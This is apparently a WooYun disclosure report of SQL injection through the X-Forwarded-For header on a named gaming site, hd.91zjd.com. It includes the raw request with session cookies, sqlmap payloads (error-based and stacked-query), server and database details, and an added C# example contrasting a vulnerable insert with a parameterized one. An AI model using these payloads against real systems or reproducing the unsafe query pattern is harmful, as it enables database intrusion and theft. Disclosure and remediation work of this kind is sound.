
Vulnerability summary

Defect ID: wooyun-2016-0204274

Title: SQL injection via the X-Forwarded-For header on a 紫金岛游戏 (Zijindao Games) site

Vendor: 91zjd.com

Author: 路人甲

Submitted: 2016-05-03 11:25

Fix date: 2016-05-09 09:00

Disclosed: 2016-05-09 09:00

Type: SQL injection

Severity: High

Self-assessed Rank: 11

Status: vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2016-05-03: details sent to the vendor, awaiting vendor handling
2016-05-09: vendor actively ignored the vulnerability, details disclosed to the public

Brief description:

Detailed description:

GET /Manage/Reg.aspx HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
X-Forwarded-For: q*
X-Requested-With: XMLHttpRequest
Referer: http://hd.91zjd.com/
Cookie: ASP.NET_SessionId=ibe25ph3xwts1fbihblpyjyf; PHPSESSID=cr8njnjl1mdsglra7j9gmmpd55; HMACCOUNT=E8E753AFF72A1AEA; CNZZDATA4909912=cnzz_eid%3D53645248-1461846717-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1461846717; Hm_lvt_13ddb2b3f776e22091a45a3f47d175d9=1461846714,1461846716; Hm_lpvt_13ddb2b3f776e22091a45a3f47d175d9=1461846716; bdshare_firstime=1461846715790; BAIDUID=3AA905FB43E5A681283C2869CC3F297A:FG=1; BAEID=AEB933863707154BAE91C97D8FD3C417:FG=1
Host: hd.91zjd.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: X-Forwarded-For #1* ((custom) HEADER)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: q' AND 9916=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (9916=9916) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(107)+CHAR(113))) AND 'kEJm'='kEJm
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: q';WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
Database: zjddb
[244 tables]

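Added example for context, not code from the original report or from 91zjd.com: a hypothetical ASP.NET handler that records the X-Forwarded-For header in SQL Server, first in the string-concatenated form that the sqlmap result implies, then in a validated, parameterized form. The table and column names (TLoginRecord, ClientIP, LoginTime) and the method names are assumptions.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Net;
using System.Web;

// Hypothetical reconstruction of the flaw class in this report: the attacker-controlled
// X-Forwarded-For header is copied into a T-SQL string before being stored.
public static class RegLog
{
    // VULNERABLE: the header value is concatenated into the query, so a value
    // containing a quote and a semicolon is executed as SQL (error-based and
    // stacked-query injection, as sqlmap found above).
    public static void LogVisitUnsafe(HttpRequest request, SqlConnection conn)
    {
        string ip = request.Headers["X-Forwarded-For"] ?? request.UserHostAddress;
        string sql = "INSERT INTO TLoginRecord (ClientIP, LoginTime) VALUES ('" + ip + "', GETDATE())";
        using (var cmd = new SqlCommand(sql, conn))
            cmd.ExecuteNonQuery();
    }

    // HARDENED: accept the header only if it parses as an IP literal, then bind it as
    // a typed parameter so the DBMS never interprets it as SQL.
    public static void LogVisitSafe(HttpRequest request, SqlConnection conn)
    {
        string ip = ClientIp(request);
        const string sql = "INSERT INTO TLoginRecord (ClientIP, LoginTime) VALUES (@ip, GETDATE())";
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@ip", SqlDbType.VarChar, 45).Value = ip;
            cmd.ExecuteNonQuery();
        }
    }

    // X-Forwarded-For is set by the client; trust it only behind a proxy you operate,
    // and fall back to the socket address when the first hop is not a valid IP.
    public static string ClientIp(HttpRequest request)
    {
        string xff = request.Headers["X-Forwarded-For"];
        if (!string.IsNullOrEmpty(xff))
        {
            string first = xff.Split(',')[0].Trim();
            IPAddress parsed;
            if (IPAddress.TryParse(first, out parsed))
                return parsed.ToString();
        }
        return request.UserHostAddress;
    }
}
```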
Proof of vulnerability:

Remediation:

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2016-05-09 09:00

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None yet